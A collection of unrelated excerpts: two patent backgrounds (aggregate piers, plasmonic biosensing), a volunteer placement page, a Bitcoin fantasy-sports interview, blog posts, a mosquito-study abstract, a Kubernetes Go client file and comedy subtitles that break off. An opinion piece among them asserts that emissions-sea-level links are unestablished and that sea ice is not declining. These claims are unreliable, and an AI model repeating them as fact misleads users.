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[ "1. ", "Field of the Invention\nIn a principal aspect, the present invention generally relates to a method of soil densification and improvement for the purpose of forming a stiffened support pier in a cavity within the densified and improved soil.", "\nThe present invention additionally relates generally to the field of civil and construction engineering and, more specifically, is directed to methods and apparatus for providing load supporting aggregate piers in the earth capable of supporting a multitude of possible structures including, but not limited to, buildings, roads, bridges and the like.", "\n2. ", "Description of the Prior Art\nMany soils are deficient in their capability to incorporate a shallow support system such as shallow foundations or a shallow mat system. ", "Consequently, when building a structure, highway embankment or retaining wall, it is often necessary to provide a special foundation support for the structure and various techniques have been developed to provide adequate subsoil support for such structures to prevent excessive settlements and to prevent bearing failures. ", "For example, pilings may be driven into the ground to bedrock. ", "Various techniques have also been developed for densifying and improving the ground and utilizing the improved ground in combination with pilings or stiffened piers or footings constructed therein.", "\nIt has been conventional practice for many years to provide vertical, elongated cavities in the earth for receiving aggregate to form what is known as “stone columns”. ", "In one conventional procedure cavities are formed by vertically vibrating a vibroflot cylindrical tube into the ground. ", "The vibroflot tube has motor driven eccentric weights in its lower end for applying lateral or radial vibrations to the tube and the short conical tool. ", "Penetration of the earth by the tube is assisted by either air or water jetting means. ", "Older devices of the foregoing type use water jetting means and drop aggregate, crushed stone or other granular materials into the cavity from the ground surface in what is referred to as a “wet method”. ", "More recent variations have employed air jetting and introduction of stone through the tube.", "\nMajor problems with the wet method process are that it adds water to the cohesive clay soils around the vibroflot so as to soften the soil, and it produces effluent containing suspended particles that are often required to be treated. ", "Unfortunately, the application of horizontal vibration applied to the stone results in a column having low stiffness in comparison to short aggregate piers as discussed in the following paragraphs.", "\nA more recently employed method of providing short aggregate piers is that of Fox et al. ", "U.S. Pat. ", "No. ", "5,249,892, which teaches use of a rotary drill to form a cavity typically of 18 to 36 inches in diameter, in the manner discussed in column 5, of the patent. ", "Upon completion of the cavity, a thin lift (layer) of aggregate is placed in the bottom of the cavity and compacted vertically and outwardly by high energy impact devices (hydraulic hammers) applying direct downward and high frequency ramming to each thin lift of stone with the procedure then being repeated with subsequent thin stone lifts until the cavity is filled to complete the short pier. ", "Shortcomings of such procedures include the required use of a casing to stabilize the sidewalls of the cavity above its lower end, when installations are in unstable soils which cave in, such as sands and sandy silts. ", "Also, instability at the bottom of the cavity in granular soils with a high groundwater level is a frequent problem because of the water attempting to flow or pipe into the casing so as to create unstable conditions at the bottom of the cavity. ", "Moreover, the depth of the cavity is limited to approximately 30 feet because of structural limitations of the equipment. ", "A further problem arises in soft, cohesive or organic soils in which the load capacity of the pier to support loads is limited by the fact that the soft soil provides limited resistance to outward bulging movement of the stone piers.", "\nFox U.S. Pat. ", "No. ", "6,354,766 discloses a variety of special techniques, including pre-loading, chemical treatment and use of mesh reinforcement procedures to enhance the construction and test the properties of short aggregate piers.", "\nFox U.S. Pat. ", "No. ", "6,354,768 discloses the use of expandable bladders for densifying soil adjacent or below stone piers.", "\nAnother method of forming a stone pier is disclosed in U.S. Pat. ", "No. ", "6,425,713 in which a lateral displacement pier, also know as a “cyclone pier”, is constructed by driving a pipe into the ground, drilling out the soil inside the pipe and filling the pipe with aggregate. ", "The pipe is then used to compact aggregate in thin lifts by use of a beveled edge at the bottom of the pier for compaction. ", "Piers fortified by this method can be installed to great depths such as 50 feet and in granular soils. ", "Limitations of this approach include the need for a heavy crane for installation and a drill rig to drill out the casing. ", "Additionally, the system is cumbersome and slow to install when the installation uses a normal crane and pipe having diameters such as listed in the patent.", "\nAnother system developed by Mobius and Huesker in Germany provides an encased stone column by pushing a closed-ended pipe into soft ground by use of a vibratory pile driving hammer mounted at the top of the pipe. ", "When the lower end of the pipe reaches designed depth, a geotextile sock or bag is inserted into the inside of the pipe. ", "This sock is then filled with crushed stone poured from the ground surface. ", "After the sock is filled a trap-door opens at the bottom of the pipe and the pipe is extracted upwardly while the geotextile sock and its contents remain in the excavation. ", "The primary advantage of this system is that the geotextile sock prevents the bulging of the crushed stone into the surrounding soil when loaded. ", "However, a number of disadvantages include the fact that the column is not compacted and does not have high stiffness sufficient for supporting buildings and the like. ", "Additionally, this system must be installed in very soft or loose soil that can be penetrated by closed-ended pipe pile driven with a vibratory pile driving hammer.", "\nAnother prior system developed by Nathaniel S. Fox employs a 14 inch to 16 inch diameter tamper head attached to the lower end of an 8 inch to 10 inch diameter cylindrical pipe. ", "The pipe is vibrated into the ground and is filled with crushed stone once the tamper head is driven to the desired designed depth. ", "The tamper head is then lifted to allow stone to fall into the cavity following which the tamper head is driven back downwardly onto the stone for densifying the stone.", "\nA deep dynamic compaction system developed by Louis Menard employs a heavy weight which is dropped from a great height to pound the ground. ", "Each drop creates a crater at the ground surface and generates significant ground shaking and causes granular soils to densify for the future support of structures. ", "The system can be employed by placing fresh stone in the cavities formed by the dropped weight and then tapping the stone downward to form stone pillars used to support vertical loads. ", "Similar methods are illustrated in United Kingdom Patent No. ", "369,816, Italian Patent No. ", "565,012, and French Patent No. ", "616,470. ", "The disadvantages of these processes include the need for a large crane to lift the dropped weight and the excessive vibration that is induced during tamping.", "\nAnother system for making aggregate piers, involving driving a pointed mandrel has been used by a contractor in the United Kingdom and is disclosed in a brochure of Roger Bullivant Ltd dated June 2002. ", "The disclosed device uses a vibrator piling hammer to direct the mandrel into the ground to provide a cavity for receipt of crushed stone. ", "The mandrel has a sharply pointed end, which inhibits the compaction of the stone at the top of the pier.", "\nDensification of the soil and construction of a stiffened pier column using the techniques of the type described in the aforesaid prior art comprises a mechanical densification process. ", "Various mechanical means are utilized to alter, densify and otherwise improve the characteristics of the soil enabling the soil to effectively incorporate support piers. ", "The process also produces a stiffened pier, which in combination with the improved adjacent soil, results in an effective structural support system for shallow foundations, slabs and mats.", "\nA problem typically arises in sandy soil and other unstable soils in that drilled holes often cave in and require expensive preventive measures to prevent the cave-ins. ", "Another problem with drilled holes is that cuttings are brought to the ground surface and they require disposal. ", "This later problem is particularly onerous when the soils being penetrated are contaminated, since disposal of contaminated soils is extremely expensive." ]
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[ "The invention is generally directed to systems and methods for high-throughput, real-time detection of analytes in fluids, for example, bodily fluids (e.g. cytokines in blood, glucose in saliva, tears and blood, etc.).", "\nCurrent detection and screening techniques use low throughput, highly selective, non-scalable methods, which require labeling of the target molecule with a fluorophore to tag the specific molecule under study. ", "These methods have several drawbacks: (1) prior knowledge of the molecule to be sensed is necessary, (2) modification of its structure is often needed to incorporate the tag, and (3) the tag molecule can change the way the primary molecule binds to other molecules, reducing the accuracy of an assay. ", "Under alternative aspects of the present disclosure, label-free sensing is achieved using surface plasmon resonance (SPR) in thin metal films functionalized with specific linkers to selectively capture the analyte to be detected.", "\nTypical SPR implementations rely on a prism or metallic grating (such as groove, slit and hole arrays) to couple the incident beam into propagating surface plasmon polaritons (SPPs), using light incident at a wavelength-specific angle. ", "Also widely used are localized surface plasmon resonances (L-SPRs) in metal nanoparticles producing resonant scattering and extinction at specific frequencies. ", "Given the resonant nature of the SPP excitation, practical implementations of SPR-based sensing schemes are limited in the number and range of wavelengths that can be used to sense the presence of analytes, thus further limiting their spectroscopic capabilities. ", "Furthermore, SPR-based systems require large-volume samples and are limited to the detection of chemicals one at a time.", "\nThe dispersion relation of SPP waves shows longer wave vectors compared to electromagnetic waves traveling in dielectric materials (See FIG. ", "1a). ", "This is why light incident upon a flat metal surface cannot excite surface plasmon polaritons directly (See FIG. ", "1b).", "\nAccording to aspects of the present disclosure, excitation of SPP waves can be achieved by nano-corrugations, patterned on a flat metal surface (See FIGS. ", "1c-e), for example, grooves, slits, holes, or any surface plasmon launcher, which is any structure that can act as a SPP localized source.", "\nFIG. ", "2a shows a commercially available Surface Plasmon Resonance (SPR) biochip. ", "By measuring the angular shift of this characteristic band, detection of a refractive index change is accomplished. ", "This approach leads to table-top instruments, where a large sensing area is needed to detect only one specific molecule per measurement session, thus limiting the throughput. ", "Moreover, SPR sensors are monochromatic, in that they typically employ a single illumination wavelength, and they cannot determine the spectral fingerprints of the analyte.", "\nAlternative approaches to label-free detection include fiber-optics, dielectric waveguides, nanowires, biochips, mechanical cantilevers, microring resonators, but none of the previous methods has shown significant throughput capabilities. ", "For example, FIG. ", "2b shows an ultra high-Q microtoroid sensor.", "\nLabel-free detection can also be realized by measuring some optical properties of functionalized noble-metal nanoparticles, such as Surface Enhanced Raman Scattering (SERS), or Mie scattering and light extinction. ", "For example, FIG. ", "2c shows a nanoscale biosensor. ", "Unfortunately, the detection throughput is strongly limited by the difficulty to reliably address the response of several nanoparticles at once, by the challenging task to achieve uniform coating of all nanoparticles with a linker, and reproducible sensor response.", "\nFIG. ", "2d shows a typical implementation of SPR, which involves a prism to excite the surface plasmons at the functionalized metal/dielectric interface, which happens when the incident angle is precisely chosen at a specified wavelength. ", "In order to improve throughput, other techniques, such as SPR imaging, have been developed that allow several device cells (˜102) to be used in parallel to image the binding interaction and monitor intensity variations caused by a refractive index change in each cell.", "\nAnother method to excite SPR employs metallic gratings (such as hole, slit and groove arrays) as shown in FIGS. ", "2e-g. This method is based on the idea that the prism is replaced by a periodic array of scatterers etched in a metal film. ", "Excitation of surface plasmons occurs at those resonant wavelengths (or angles, given a specific incident wavelength) satisfying the grating coupling condition. ", "Therefore, reflection and transmission spectra from these devices are also characterized by sharp peaks corresponding to the wavelength- or angle-specific resonant condition. ", "Metal nanoparticles are also widely used, which are characterized by sharp spectroscopic features in their scattering and extinction spectra, so-called localized surface plasmon resonances (LSPRs). ", "Upon binding of the analyte of interest to the functionalized nanoparticle surface, a shift in the peak position of the LSPR is observed and the relative wavelength shift can be used to quantify the amount of analyte adsorbed at the surface. ", "Given the “resonant” nature of the surface plasmon excitation, all the previous approaches involving SPR (prism-, grating-coupled, or localized) are limited in the number of wavelengths that can be used to sense the presence of the analyte. ", "Therefore, the refractive index associated to the analyte can be measured only at one specific wavelength, thus strongly limiting the spectroscopic capabilities of any currently available SPR technique.", "\nAccording to aspects of the present disclosure, a nanoscale plasmonic interferometer in one manifestation comprises of two grooves flanking a slit in a silver film is provided (see FIG. ", "2g).", "\nA plasmonic-based device that accurately measures chemical and biological analytes in real-time is provided. ", "Chemical analytes include but are not limited to dielectric materials such as semiconductor quantum dots (QDs) (see FIG. ", "3a), analytes embedded in thin films, or molecules in a gas or liquid phase. ", "Biological analytes include but are not limited to proteins (e.g. cytokines in blood serum) and small molecules (e.g. glucose in bodily fluids) (see FIG. ", "3b-d).", "\nIn addition to a better understanding of light-matter interaction at the nanoscale, the disclosed methods and systems impact the throughput capabilities of several analyses and assays relevant to human health and currently used in the life sciences, and serve as an alternative high-throughput scheme for faster drug discovery, as well as more efficient identification and screening of novel therapies." ]
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[ "PlacementsWhere can you go with the Cagliero Project\n\nFatumaca Novitiate and Technical School\n\nFatumaca, Timor-Leste\n\nThe Salesians of Don Bosco have been in Fatumaca since 1964. ", "It is an incredible place that has many different activities taking place – it is almost like a small city unto itself. ", "In addition to the novitiate and technical school, Fatumaca is also home to the aspirants, a vibrant parish and a primary school. ", "Their commitment towards sustainability is very impressive and there is a fully functioning farm that supports all facets of the community.", "\n\nThe Novitiate is a place where young men continue to depth their relationship with God and discern if they are called to a life as a Salesian of Don Bosco. ", "These young men come to Fatumaca for further training after spending one year in Los Palos. ", "They continue to be educated and develop their skills. ", "One of the key aspects of their education is further studies in English. ", "Cagliero volunteers are crucial to assisting in this area.", "\n\nAt Don Bosco Technical School approximately 250 students have the opportunity to specialise in construction, mechanical, electrical installation and electronic communications. ", "Each year there are more than 400 applicants for less than 100 places. ", "It provides a comprehensive education with skills that lead to employment for many of the graduates.", "\n\nTimor Leste is a new venture for the Cagliero Project and we look forward to supporting them with volunteers from diverse backgrounds. ", "The Cagliero volunteers will primarily engage with the novices however there are also other opportunities to engage with the other areas of the community. ", "Volunteers needed for this placement include professional teachers, youth workers, social workers and tertiary students from areas such as education and development.", "\n\nFatumaca needs volunteers to work in the following areas:\n\nteaching English as a second language (ESL) to the novices\n\nconducting afterschool tutoring sessions and evening activities\n\nteaching technical skills in construction, mechanics and electronics\n\nparticipating in oratory and parish activities with the local young people\n\nWhy volunteer with Cagliero\n\nThe Cagliero Project gives Australians an opportunity to devote six to twelve months in volunteer service to youth in overseas Salesian communities. ", "The Salesians are known for their work with vulnerable and disadvantaged youth. ", "Therefore our volunteers are placed in projects such as schools, youth centres and orphanages.", "\n\nChoosing a volunteer program is one of the most important decisions you will make. ", "We encourage prospective volunteers to investigate multiple programs and find the one that best ‘fits’ their philosophies and skill set." ]
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[ "Fantasy sports has always seemed like a promising area for Bitcoin acceptance. ", "An industry dependent on online payments with over US$1 billion bet in the U.S. each year on fantasy football alone, much of it pooled in leagues stretching across the nation, fantasy sports would benefit greatly from the ability to send money without being subject to PayPal fees or worries about credit card fraud. ", "However despite these advantages, fantasy football with Bitcoin seemed to be limited to a custom BitcoinTalk league with escrow services provided by NitrogenSports.", "\n\nThat is no longer the case. ", "Just in time for the 2014 NFL season daily fantasy sports has been introduced to the world of Bitcoin through the new site Victiv.com. ", "Following a trial period, they announced the launch on /r/Bitcoin and have since been active on Twitter and Reddit offering promotions and technical assistance.", "\n\nShowing the potential of this industry, Victiv was able to raise US$2.7 million in seed funding to launch their website. ", "While that’s an impressive haul, they do have some stiff competition. ", "Industry leader FanDuel recently raised US$70 million in venture capital. ", "CEO Matt Primeaux is nonetheless confident in his company’s future, saying “our concentration will stay the same — build the best product, build the best user experience.”", "\n\nSince Bitcoin seems to be an important part of accomplishing this mission, I contacted Matt to get his thoughts on the advantages of cryptocurrency and the community which surrounds it.", "\n\nCointelegraph: Why do you like accepting Bitcoin?", "\n\nMatt Primeaux: There are so many great things about Bitcoin and the Bitcoin community, but there’s one major underlying reason we wanted to, and did, launch with Bitcoin as a deposit and withdrawal option.", "\n\nIf our goal and concentration truly is to build the best product available in the market, then we need to provide the most up-to-date and forward thinking features possible. ", "Not only does the Bitcoin community overlap well with our target demographic, but we believe our users will appreciate a business that has their best interests in mind, and that just wouldn’t be the case if we didn’t accept this exciting currency.", "\n\nCT: What inspired you to start Victiv?", "\n\nMP: The daily fantasy sports space is one I’ve been keeping an eye on for years. ", "Prior to co-founding Victiv.com, I was living in Europe with my wife and working in the online poker industry. ", "Throughout that time, I watched this industry from afar as a few sites and a concentrated user base grew into the mainstream following it’s becoming today.", "\n\nWe believe that daily fantasy sports currently sits on an inflection point that will propel the popularity of this niche industry, and could see much more than US$5 billion in contests played annually. ", "Our goal at Victiv.com is to provide a better, more engaging daily fantasy sports product. ", "Everything we do — from the 15-person team we have here in Austin, TX to the technology stack that we’re working with — is geared towards building the best experience for our users.", "\n\nCT: Were you always planning on accepting Bitcoin? ", "Or was it something you decided upon as you developed the site?", "\n\nMP: Absolutely.", "\n\nAs a long-time follower of Bitcoin, including my fateful decision not to invest US$5,000 when it was trading for a few cents back in summer 2010 (one of my co-founders talked me out of that investment — it’s been a long road to forgiveness), I’ve always been a fan of the alternative currency movement.", "\n\nIn my office in Gibraltar, I had a conference table set up with 2 monitors — one with the major indices and the other with Clark Moody. ", "As the conversion price of Bitcoin continued to rise, and as the Bitcoin community continually demonstrated their support of businesses that accepted Bitcoin, we knew that it was an absolute necessity to launch Victiv.com with Bitcoin acceptance.", "\n\nWe partnered with Coinbase to make the transactions process simple, and are extremely thrilled with our decision thus far.", "\n\nCT: Are you planning on adding other sports? ", "And if so, what does the timeline for that look like?", "\n\nMP: Yes, we have partnered with STATS LLC to provide us NFL, NBA, NHL, MLB, PGA, and NCAA football and basketball. ", "We’ve launched with NFL, and are currently in the process of building our algorithms for pricing NBA and NHL players, which will launch here in October.", "\n\nOur team has been great in building a platform that’s more-or-less sports agnostic. ", "Our CTO, Steven “Mick” Giles, was previously a senior director at Electronic Arts and SonyOnline where he concentrated on platform architecture and technology.", "\n\nAdd our CIO, Earl “Mitch” Mitchell (yes, they both go by similar names, neither of which are their actual names!), ", "who was a Director of Technology and predictive analytics wizard at Wolfram Alpha’s consulting arm, and we’re able to use some of the most cutting edge technologies and analytics platforms to provide not only a better website for our users, but the sharpest, most predictive athlete pricing in the market.", "\n\nCT: You’ve said there have been more Bitcoin deposits than any other form of payment so far. ", "Can you go into further detail with hard numbers or percentages?", "\n\nMP: I can’t share the details, but I can re-emphasize that we’ve been extremely proud to be one of the first mainstream daily fantasy sites to offer and operate with Bitcoin deposits and withdrawals. ", "We have seen a significant amount of support from the fantasy sports playing Bitcoin community, and know each time there’s a deposit of more than US$1,000 on Victiv.com, it’s likely from a Bitcoin player.", "\n\nCT: Do you offer any promotions for customers using Bitcoin?", "\n\nMP: Right now, all of our new players receive a 100% drip-in deposit bonus up to US$1,000. ", "We also ran US$20,000 worth of free and guaranteed contests in NFL Week 1, and are running US$27,000 worth of contests for NFL Week 2.", "\n\nWe have a few special plans in the future for Bitcoin players, but don’t want to tip our hands too early.", "\n\nDid you enjoy this article? ", "You may also be interested in reading these ones:" ]
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[ "To sign up for my newsletter (with links to newly posted blogged essays), please use this Contact form.", "\n\nDo You Want to Write a Guest Blog?", "\n\nI welcome literate, intelligent and/or funny guest blogs that entertain, inform, enlighten and, most importantly, will be of interest to my readers. ", "And yes, I am open to fresh, good ideas, even if I might disagree with them.", "\n\nConnect with Sally on:\n\nCategories\n\nArchives\n\nPhotography\n\nAs you can imagine I have lots of friends and business associates in Silicon Valley, but I haven’t been there for some time. ", "So, realizing that the Worldcon of Science Fiction would be in San Jose, California I arranged to arrive a couple of days early to see folks.* ", "Last Wednesday (the day before Worldcon), I walked the single block from my hotel to Adobe’s headquarters, where I had a series of interesting, enjoyable meetings and lunch with four different development teams.", "\n\nI have been following, teaching, using, writing and consulting about Adobe products since Photoshop 1.0. ", "It’s been fun watching how the whole category of software has blossomed and expanded, and how the culture has changed. ", "The advantages of longevity as a journalist and artist is that I know more about the evolution of Photoshop, Illustrator, InDesign, Typekit and other related programs than many of Adobe’s own employees. ", "Of course, I spin them into stories that they apparently enjoy hearing.", "\n\nFor this visit, I had meetings with product managers and PR reps for Adobe Lightroom, Typekit, Iilustrator, Spark, and XD. ", "Here are a few of the highlights. ", "Read More\n\nFacebook has decided that I post offensive material, and I have been warned to desist.", "\n\nOn Saturday morning, I logged into Facebook, expecting to spend a few minutes checking what my friends were up to, reposting some of their more interesting comments, pictures and links, and responding to messages. ", "I also had links that I wanted to post about art, writing, grants and creativity – plus the usual humorous, heartwarming or meaningful pictures or videos I thought folks would enjoy. ", "In other words, I planned a routine social visit on Facebook, before logging off to work on my current novel in progress.", "\n\nBut Facebook had other plans for me.", "\n\nInstead of taking me directly to my FB page, a rather intimidating message popped up. ", "It stated in no uncertain terms that I had posted an offensive nude photograph, which Facebook had excised from my page and feed (i.e. censored). ", "Then I was shown my online albums, was commanded to remove any other pictures of naked people, and I had to confirm by checkmark that I had no such pictures left on Facebook. ", "I didn’t think they were referring to the various Renoirs, Matisses, Goyas, Picassos and such that I’ve posted over the years. ", "So I clicked the Agree button, and I was allowed to enter Facebook’s supposedly squeaky clean domain.", "\n\nOf course, I knew immediately which photograph Facebook had found so offensive, and I’m convinced it wasn’t because it was of nude women, but because it was of obese nude women.", "\n\nLike many millions of others, my fascination with Leonard Nimoy began with a young girl’s crush on Mr. Spock. ", "But it was only as I learned more about the man behind the actor, that I began to admire him – as a thinker, author, artist and philanthropist. ", "And then there was the phone call.", "Read More" ]
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[ "Histological parameters useful in the identification of multiple bloodmeals in mosquitoes.", "\nCulex nigripalpus females were given double and, in 2 cases, triple (interrupted) bloodmeals separated by various intervals. ", "Mosquitoes given single meals served as controls. ", "Using Azan-stained serial paraffin sections, we could identify multiple meals separated by 1-72 hr in 44 of 53 cases (84.6%). ", "Among the histological parameters of importance in the identification of double and triple bloodmeals are the peritrophic membrane secreted around each bloodmeal, the plug which forms between the anterior and posterior midgut, the layer of heme which forms as a bloodmeal is digested, and remnants of the pupal meconium and/or pupal-pharate adult peritrophic membranes. ", "The parameters we have identified will help determine the incidence of double bloodfeeding in wild populations which, in turn, should enhance our understanding of the transmission of pathogens by mosquitoes." ]
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[ "If sea levels are truly rising due to climate change, then public policy should stop encouraging new development in coastal areas. ", "Stipulating that this threat is real for the moment, serious and damaging encroachment of the seas might be 50 years away or more. ", "By that time, many of today’s coastal buildings will be gone, or at least candidates for replacement, under realistic assumptions about the average lives of structures. ", "A relatively low-cost approach to the threat of rising seas would be to stop building along the most vulnerable coasts right now and move new development inland. ", "Yet no one wants to do that, least of all coastal property owners. ", "But there is little discussion of this alternative even among the true believers of a coming global warming apocalypse. ", "Why not?", "\n\nThis and related questions have been asked recently by several writers, including Glenn Reynolds and economist Robin Hanson. ", "There are alternatives to discouraging new construction along coasts. ", "Other expensive abatement projects can be pursued, now and later, such as sea walls or even adding land mass excavated from the sea floor or inland. ", "In fact, the prospect of damming the Strait of Gibraltar to protect Mediterranean coastlines has been discussed. ", "The expense of such an unprecedented public works project is what prompted Hanson’s post. ", "To the extent that such remedial projects are not funded privately, they represent social costs arising from coastal development.", "\n\nThe federal government still subsidizes flood insurance on many coastal properties, though efforts to phase-out this FEMA program have been underway for a few years. ", "However, governments seem only too willing to undertake the investment in public infrastructure and ongoing maintenance made necessary by new coastal development. ", "And like other development projects, tax abatements and other subsidies are still granted for coastal development. ", "Why do these policies escape notice from coastal green elites? ", "Public outlays with private beneficiaries along threatened coasts are an immediate drain on resources, relieving private developers and property buyers of shoreline risk.", "\n\nReynolds (perhaps tongue-in-cheek) and Hanson suggest that new development should be taxed in coastal areas. ", "That, and ending subsidies for development along coasts, is an economically and ecologically defensible alternative to the public expense of ubiquitous sea walls. ", "However, a coastal tax might not be in the immediate interests of elites who claim that mankind faces an insurmountable global warming problem. ", "Better to put off these sorts of remedial measures, especially while you can tax and regulate fossil fuels, and maybe live on the coast!", "\n\nThe position of the warmist community is that carbon emitters must cease and desist, in the hope that the seas will stop rising. ", "They are willing to destroy entire industries (fossil fuels) in pursuit of their goals, but are unlikely to achieve them without inflicting drastic economic harm. ", "If greens are so amenable to central control of economic activity and individual behavior (so long as they are at the controls), it would be prudent to take precautions now that will help to minimize the damage later. ", "Discouraging coastal development with taxes and denial of subsidies is the sort of classic intervention that any Pigouvian planner should love. ", "There is even evidence that sea levels have been much higher at times in the past. ", "An earnest central planner might say that coastal development should always be discouraged to mitigate the risk of destruction.", "\n\nI am skeptical of alarmist claims, including those related to rising sea levels. ", "In fact, the connection between carbon emissions, global temperatures and sea levels is not well established, and whether sea levels are rising due to human activity is a matter of some dispute. ", "Furthermore, global sea ice extent is not declining dramatically, if at all, and the storied glacier melts have been greatly exaggerated. ", "Climate activists pursue their agenda despite the gross inaccuracy of past carbon-forcing forecasts, the gaping uncertainty surrounding model predictions going forward, and the crushing expense of the measures they advocate. ", "The expense, however, is not one that activists expect to compromise their own standard of living. ", "They either assume that it will be borne by others or that their draconian prescriptions will usher in an era of “sustainability”, powered by new, renewable energy sources. ", "Not many of these alarmists would boast that their policies can quickly reverse the sea level rises they’ve told us to fear, but they dare not suggest taxes on coastal development until they see more convincing evidence. ", "At least that much is sensible, if ironic!", "\n\nIn advanced civilizations the period loosely called Alexandrian is usually associated with flexible morals, perfunctory religion, populist standards and cosmopolitan tastes, feminism, exotic cults, and the rapid turnover of high and low fads---in short, a falling away (which is all that decadence means) from the strictness of traditional rules, embodied in character and inforced from within. -- ", "Jacques Barzun" ]
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[ "Delta County\n\nDelta County is the name of several counties in the United States:\n\nDelta County, Colorado \nDelta County, Michigan \nDelta County, Texas\n\nSee also\nDelta (disambiguation)" ]
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[ "/*\nCopyright The Kubernetes Authors.", "\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.", "\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "\nSee the License for the specific language governing permissions and\nlimitations under the License.", "\n*/\n\n// Code generated by client-gen. ", "DO NOT EDIT.", "\n\npackage v1beta1\n\nimport (\n\trest \"k8s.io/client-go/rest\"\n)\n\n// ScalesGetter has a method to return a ScaleInterface.", "\n// A group's client should implement this interface.", "\ntype ScalesGetter interface {\n\tScales(namespace string) ScaleInterface\n}\n\n// ScaleInterface has methods to work with Scale resources.", "\ntype ScaleInterface interface {\n\tScaleExpansion\n}\n\n// scales implements ScaleInterface\ntype scales struct {\n\tclient rest.", "Interface\n\tns string\n}\n\n// newScales returns a Scales\nfunc newScales(c *AppsV1beta1Client, namespace string) *scales {\n\treturn &scales{\n\t\tclient: c.RESTClient(),\n\t\tns: namespace,\n\t}\n}\n" ]
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[ "\"Ripped By mstoll\" \"Welcome to Limmy's Show.\" \"", "Imagine you're in a record shop and you saw that.\" \"", "You'd be like this...\" \"Wouldn't you?\" \"(", "♪ JEAN MICHELLE JARRE:\" \"Oxygene (Part IV))\" \"Welcome back to Adventure Call, where we rejoin Stevie on line two.\" \"", "All right, Falconhoof?\" \"", "Do you realise, Stevie, that you are on the verge of the being the first traveller to find the Black Ruby of Voldesade?\" \"", "Aye.\" \"", "Can we just get oan wi'it, mate?\" \"", "That's half an hour I've been playing this, c'mon.\" \"", "Very well.\" \"", "As you recall, we are in a marble hallway.\" \"", "In the centre is a statue of Hermes.\" \"", "To the east is a tunnel of no return.\" \" ", "Right...\" \" And to the west is a maze.\" \"", "Kiss feet of Hermes.\" \"", "You kiss the feet of Hermes?\" \"", "A pair of winged sandals appears next to...\" \"Yes!\" \"", "Get winged sandals!\" \" ", "I told you, didn't ah?\" \"!\" \" ", "I must warn you again, Stevie, that I cannot receive your instructions until I have finished describing the environment to the viewers at home.\" \"", "Right, well, hurry up, then!\" \"", "A pair of winged sandals appear next to the feet of Hermes.\" \"", "What would you like to do?\" \"", "Enter tunnel.\" \"", "Are you sure?\" \"", "Move!\" \"", "You're stalling for time.\" \"", "Aye, they try to squeeze every penny oot o'you.\" \"", "Very well.\" \"", "The tunnel takes you north.\" \"", "As you exit, it vanishes behind you.\" \"", "You now stand before the Chasm of Fire.\" \"", "To the east is a maze.\" \"", "To the north, at the other side of the Chasm is... the Black Ruby of Voldesade.\" \"", "Yes!\" \"", "Jump the Chasm.\" \"", "Be careful.\" \"", "The chasm cannot be jumped by mere mortals.\" \"", "Aye, but I'm no'a mere mortal.\" \"", "I'm wearing the winged sandals, so just jump.\" \" ", "You are not.\" \" ", "I'm no' what?\" \"", "You are not wearing the winged sandals.\" \"", "How no'?\" \" ", "You do not have them.\" \" ", "Aye, I do.\" \" ", "You do not.\" \" ", "Well, where are they?\" \"", "They are next to the feet of Hermes.\" \"", "What they daen there?\" \"", "I told you to get them, I told you I wanted to wear them.\" \" ", "You did not.\" \" ", "Aye, I did!\" \"", "No, you didnae...\" \"No, you did not.\" \"", "You gave me the instructions to get the winged sandals while I was describing the surroundings,\" \" and I made it clear that...\" \" Naw.\" \"", "Naw, naw, no, mate.\" \"", "That is petty, that is petty.\" \"", "It is not petty.\" \"", "I advised you that I could not receive your instructions until...\" \"But you heard me!\" \"", "You actually heard me tell you to get the winged sandals, and you left them behind without warning me, just to prove a point.\" \"", "I did warn you, I did warn you.\" \"", "No, look, here's what we're gonna dae, right?\" \"", "You could enter the maze to return to the marble hallway.\" \"", "Aye, right, and add another £50 to my phone bill?\" \"", "Naw, mate, here's what's gonna happen, are you listening?\" \" ", "Yes.\" \" ", "I'm gonna jump over that Chasm of Fire.\" \"", "I'm going to reach the other side.\" \"", "And I'm going to get that Black Ruby...\" \" You will not.\" \" ", "I'd better, mate.\" \"", "I'm gonna get to the other side and I'm gonna get that Black Ruby and I'm gonna get my two grand.\" \"", "You will not make it, traveller.\" \"", "I'd better, mate!\" \"", "I'm warning you.\" \"", "Jump the Chasm.\" \"", "You will need the winged sandals.\" \"", "I've got them!\" \"", "I told you to get them, I've got them.\" \" ", "Now, jump the Chasm.\" \" ", "Traveller...\" \"Jump the Chasm!\" \"", "OK.\" \"", "You jump the Chasm.\" \"", "You make a pitiful jump into the flames...\" \"You are burnt to a cinder.\" \"", "You are dead.\" \"", "No!\" \"", "You're dead, mate, you're dead!\" \"", "You've just cost me two grand!\" \"", "You are a dead man.\" \"", "I'm going to find out where you drink and you're a fu!\" \"", "We're ready to take another caller.\" \"", "My name is Falconhoof, and I will be your guide on your quest.\" \"(", "DOORBELL RINGS)\" \" Will you be ma da'?\" \" (", "SCREAMING)\" \"You know what I hate?\" \"", "I hate that when I want crisps...\" \"I get chips.\" \"", "When I want fish and chips... they come wi' fries.\" \"", "I hate that the flats are noo called apartments.\" \"", "I hate that sweets are noo called candy.\" \"", "And I hate that instead of nipping' oot to the shops, you nip oot to the convenience store.\" \"", "I hate it.\" \"", "I hate when we use American words in place of words that we've already got for they words.\" \"", "Just because it's cool.\" \"", "Well, tell me, is this cool?\" \"", "There you've got an old woman, and she's needing her prescription for her chronic back pain and her bad heart.\" \"", "But she's no' getting it, because she's looking for her chemist, the same chemist she's been gaun tae for the last 30 year.\" \"", "But she cannae find it, because there in its place is...\" \"Lloydspharmacy.\" \"", "Lloydspharmacy!\" \"", "Some trendy cocktail bar, some trendy clathes shop called Lloydspharmacy.\" \"", "Lloydspharmacy, one word.\" \"", "And she's heading up the road, confused, thinking she's losing her marbles, and she's gaun tae her bed wi' her back killing her, and she's dying in her fucking sleep.\" \"", "Noo, that's not cool, because that's oor granny.\" \"", "That's your granny.\" \"", "That's a'body's granny!\" \"(", "APPLAUSE)\" \"Whoo!\" \"", "Hey!\" \"", "Shit!\" \"", "♪ I wanna have dinner with Gershwin... ♪\" \"You want to have dinner wi' Gershwin?\" \"", "The composer, George Gershwin?\" \"", "He's been deid for aboot 70 years.\" \"", "What ye gonnae dae?\" \"", "Dig his corpse up and stick it at the end o' your dinner table?\" \"", "♪ I want to watch Rembrandt 